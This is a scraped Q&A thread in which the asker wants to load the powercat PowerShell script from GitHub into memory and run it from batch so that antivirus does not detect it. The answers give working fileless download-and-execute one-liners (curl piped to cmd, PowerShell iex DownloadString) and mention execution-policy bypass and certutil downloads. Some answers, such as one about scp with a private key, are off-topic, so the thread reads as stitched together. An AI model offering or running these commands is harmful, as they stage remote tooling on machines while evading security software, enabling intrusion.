Menu
In my batch script, I am trying to download and execute a powershell script remotely. Here is the url:
https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1
I want to download the file into memory (without touching disk), for several reasons:
powershell -nop -ep bypass that causes AV detectionObviously i can use certutil:
certutil -urlcache -split -f <url>
but I don't want the file to hit disk, which can cause AV detection.
The same thing can be done with easily using other languages, like PowerShell:
(New-Object Net.WebClient).DownloadString($url)
OR
(New-Object IO.StreamReader([Net.HttpWebRequest]::Create($url).GetResponse().GetResponseStream())).ReadToEnd()
I know batch isn't the best language to do this, but is it possible? (I want pure batch)
752
When running a bath file there is no concept of running it from RAM. Windows command processor will always go back to the .bat file for the 'next' command to run. If you edit a batch file while it's running the command processor will pick up your changes.
It is not possible to copy a batch file to RAM and inform Windows command interpreter to interpret the command lines in memory. It would be possible to create a RAM disk, copy the batch file to the RAM disk and run it from there. But this just makes the task more complicated than necessary.
Despite of the other answers, it's trivial to cache a whole batch script to RAM. You only need to build a single block, as blocks are parsed and cached before they can be executed. But blocks have some drawbacks, percent expansion doesn't work, therefore you need to use delayed expansion.
If the remote server you are using restricts you to a private key/certificate for your remote connections, worry not. You can still achieve remote file download with the following syntax. $ scp -i private_key/certificate_file.pem username@server _url_or_ip:/path/to/download/file/on/server /path/to/download/location/on/desktop
curl -s https://example.com/test.bat | cmd /v:on /k
Example test.bat
@echo off
(
cls
echo Hello
echo Time: !time!
exit
)
As said in Force batch file to load to RAM before running you can cache a single command block.
There are some limitations:
With this technique you can use the normal batch macro style.
94
I know you want pure batch, but seriously though, even with Restricted execution policy of powershell, it permits individual commands. See https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7
So its as simple as
powershell -command iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With
